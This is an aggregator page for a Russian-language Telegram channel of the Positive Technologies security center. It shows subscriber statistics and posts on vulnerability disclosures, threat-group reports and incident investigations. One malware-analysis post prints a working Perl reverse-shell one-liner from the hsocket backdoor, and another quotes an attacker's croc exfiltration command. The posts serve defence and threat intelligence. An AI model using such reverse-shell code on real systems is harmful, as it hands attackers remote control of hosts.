es
Feedback

¡No caigas en manos de tramposos! Telemetrio encuentra y marca estos canales 👉 Si quieres ver la etiqueta, suscríbete 👈

ESCalator

ESCalator

Ir al canal en Telegram

Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)

Mostrar más
8 208
Suscriptores
+824 horas
+337 días
+19030 días
Atraer Suscriptores
oct '26
octubre '26
+60
en 1 canales
septiembre '26
+230
en 8 canales
Get PRO
agosto '26
+111
en 2 canales
Get PRO
julio '26
+337
en 11 canales
Get PRO
junio '26
+249
en 26 canales
Get PRO
mayo '26
+214
en 3 canales
Get PRO
abril '26
+261
en 6 canales
Get PRO
marzo '26
+289
en 6 canales
Get PRO
febrero '26
+280
en 7 canales
Get PRO
enero '26
+282
en 3 canales
Get PRO
diciembre '25
+328
en 7 canales
Get PRO
noviembre '25
+207
en 7 canales
Get PRO
octubre '25
+1 645
en 5 canales
Get PRO
septiembre '25
+149
en 4 canales
Get PRO
agosto '25
+235
en 4 canales
Get PRO
julio '25
+324
en 17 canales
Get PRO
junio '25
+222
en 6 canales
Get PRO
mayo '25
+345
en 9 canales
Get PRO
abril '25
+299
en 14 canales
Get PRO
marzo '25
+618
en 25 canales
Get PRO
febrero '25
+248
en 10 canales
Get PRO
enero '25
+444
en 10 canales
Get PRO
diciembre '24
+234
en 4 canales
Get PRO
noviembre '24
+666
en 9 canales
Get PRO
octubre '24
+416
en 8 canales
Get PRO
septiembre '24
+282
en 5 canales
Get PRO
agosto '24
+653
en 9 canales
Get PRO
julio '24
+1 144
en 3 canales
Fecha
Crecimiento de Suscriptores
Menciones
Canales
09 octubre+11
08 octubre+11
07 octubre+9
06 octubre+4
05 octubre+11
04 octubre+5
03 octubre+1
02 octubre+4
01 octubre+4
Publicaciones del Canal
На какой доклад пойдете? 🧐
Anonymous voting

2
Главная новость этой недели У нас появился сайт: https://ptesc.tech/ Мы за удобство — поэтому теперь все наши материалы, поми
Главная новость этой недели У нас появился сайт: https://ptesc.tech/ Мы за удобство — поэтому теперь все наши материалы, помимо соцсетей, будут выходить еще и там: на русском и английском. В планах — публиковать большие исследования, которые не уместить в стандартный пост. Кстати, все публикации из ESCalator мы уже перенесли в блог. 👋 А теперь новость внутри новости: к запуску сайта мы подготовили серию постов про уязвимости в NTFS, начинающуюся с разбора CVE-2026-20840 — out-of-bounds write in ntfs!PageUpdateAnalysis. Злоумышленник может воспользоваться уязвимостью, заставив систему Windows смонтировать том с вредоносными записями $LogFile. Это может привести к повреждению памяти ядра и, как следствие, к отказу в обслуживании, повышению привилегий или выполнению произвольного кода в ядре. Детали и PoC — уже на новом сайте. @ptescalator
2 965
3
Sin texto...
3 644
4
Как исследовать угрозы с PT Fusion Сегодня в 14:00 (мск) проведем вебинар, на котором разберем ландшафт угроз в России за пер
Как исследовать угрозы с PT Fusion Сегодня в 14:00 (мск) проведем вебинар, на котором разберем ландшафт угроз в России за первое полугодие 2026 года и на реальных примерах покажем, как отслеживать активность хакерских группировок. Подключайтесь на сайте 🕑 Денис Кувшинов, руководитель направления TI в PT ESC, и Денис Казаков, специалист группы киберразведки, расскажут, как: 1️⃣ найти похожие вредоносные файлы по метаданным и понять, что «одиночный» образец вредоноса вовсе не одиночка. 2️⃣ выявить связи между группировками по используемым техникам и увидеть почерк злоумышленников вместо череды случайностей. 3️⃣ раскрыть инфраструктуру киберпреступников с помощью Passive DNS и найти в ней еще не «засвеченные» в атаках объекты, чтобы оказаться на шаг впереди. 4️⃣ обнаружить характерные URL-паттерны и узнать старых знакомых под новым именем. #ti @ptescalator
2 529
5
Sin texto...
2 185
6
Sin texto...
1 975
7
Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, кото
Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory corruption) в продукции компании Apple. ⚠️ Уязвимость PT-2026-76847 (CVE-2026-65330) получила средний уровень критичности — 6.5 по шкале CVSS 3.x. Делимся подробностями • Ошибка была обнаружена в BSD-подсистеме сетевого стека XNU (ядра macOS, iOS) в компоненте NECP (Network Extension Control Policy), который управляет правами доступа программ и приложений к сетевым интерфейсам. • Для взаимодействия с NECP требуется процесс с привилегированными правами, подписанный цифровой подписью (platform-signed). • При закрытии NECP-сессии ядро корректно освобождает domain-фильтры, но domain-trie (префиксное дерево доменов) остается в глобальном списке с указателем на уже освобожденную память сессии. • При удалении trie по идентификатору (ID) ядро не проверяет владельца. • Любая другая сессия может удалить чужое префиксное дерево, вследствие чего может произойти ошибка и ядро вызовет панику. 🍏 Скорее обновляйте ваши устройства Apple уже выпустила исправление безопасности в iOS/iPadOS 26.6.1, macOS 26.6.2, tvOS 27, watchOS 27 и visionOS 27. Подробная информация об исправлениях опубликована на официальных страницах Apple: macOS, iOS и iPadOS, tvOS, watchOS и visionOS. #cve #ir #ios #macos @ptescalator
2 672
8
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. Восстановить ее вручную теоретически можно, но это отнимает много времени и сопровождается потерями данных. В таких случаях применяется карвинг — побайтовый поиск сигнатур непосредственно в сыром образе, в обход файловой системы. ❗️ Команда PT ESC IR уделяет приоритетное внимание автоматизации разбора артефактов для последующего обнаружения вредоносной активности — это ускоряет восстановление картины инцидента. Наш пайплайн преимущественно реализован на Go, поэтому мы разработали собственную библиотеку на том же языке. Она разбирает готовые EVTX-файлы даже при несовпадении контрольных сумм или повреждении файла, а также выполняет карвинг событий из побитовых копий, дампов памяти и образов виртуальных дисков. О том, что поддается восстановлению и почему одни подходы дают полную структуру записи, а другие — лишь отдельные поля, читайте в нашем материале на Хабре 🫲 #ir #dfir #tip @ptescalator
3 515
9
Sin texto...
10 160
10
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово раз
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос. Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники. Например, они маскируют файл под что-нибудь безобидное: вместо zarplaty_sep_2026.pdf.exe вы увидите просто zarplaty_sep_2026.pdf. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц. В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете. 📄 .docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office. Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений. Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо x в конце здесь стоит m, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения .dotm и .xltm — это шаблоны документов с поддержкой макросов. И так же, как с .exe, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название. Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос. Так вот, к чему мы это решили объяснить 1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете. 2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением .exe, а 26% — с расширениями Microsoft Office. 3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки. О них — в полной версии исследования на нашем сайте. @ptescalator
8 258
11
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут честные доклады без записи, живое общение и никакой воды (только пенное, снова). Если вы аналитик SOC, специалист по реагированию и расследованию инцидентов или эксперт по исследованию и детектированию угроз, то вам точно зайдет. Программа на вечер (встречаемся в 18:30): 🕖 19:00 — «От инфоповода до атаки: как группировки адаптируют глобальную и российскую повестку под свои операции». Денис Казаков, специалист группы киберразведки PT ESC. 🕢 19:30 — «VantaCore: как вымогатели собирают собственный арсенал». Александр Гантимуров, руководитель направления обратной разработки Angara MTDR. 🕣 20:30 — «История про шифровальщик, который не смог». Дмитрий Логинов, реверс-инженер, CICADA8. 🕘 21:00 — «Follow the __report, knock knock, Remedy». Иван Трофименко, аналитик центра мониторинга и реагирования JET CSIRT. 🕤 21:30 — обсудим томатный гозе и другие важные вопросы. Количество мест ограничено, регистрируйтесь заранее на нашем сайте. @ptescalator
11 354
12
Sin texto...
4 387
13
Sin texto...
4 231
14
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировк
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов. Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки. Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки. В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами. Подробности — в нашем блоге 🦖 #TI #APT #Malware @ptescalator
3 258
15
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструме
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта. 1️⃣ hsocket — бэкдор, имеющий следующий функционал: • запуск интерактивной командной оболочки • запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter) • сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов) • защита файлов от удаления • установление reverse shell-соединения с управляющим сервером с помощью кода на Perl: perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){ open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};" • скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas) 2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы. 3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов. В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО. Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском: // Fungsi untuk tampilan halaman login $Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari"; Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода: //------------------GECKO SHELL, RECODED BY AYANA--------------------// <!-- Gecko Folder File Manager --> IoC: hsocket.io /tmp/hs-data/ #ir #dfir #detect #ioc #malware @ptescalator
3 209
16
Sin texto...
3 656
17
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3). В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧 Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell. /home/usr1cv8/.bash_history: cat res.txt /home/usr1cv8/.bash_history: rm res.txt После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки. 🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов. На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc. 💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET. В качестве сетевого индикатора может служить домен getcroc.com. #ir #tip #apt #detect #dfir @ptescalator
3 764
18
Sin texto...
3 881
19
Sin texto...
4 906
20
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Te
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️ Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором. 😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor. Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки. О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏 #TI #APT #Malware @ptescalator
3 895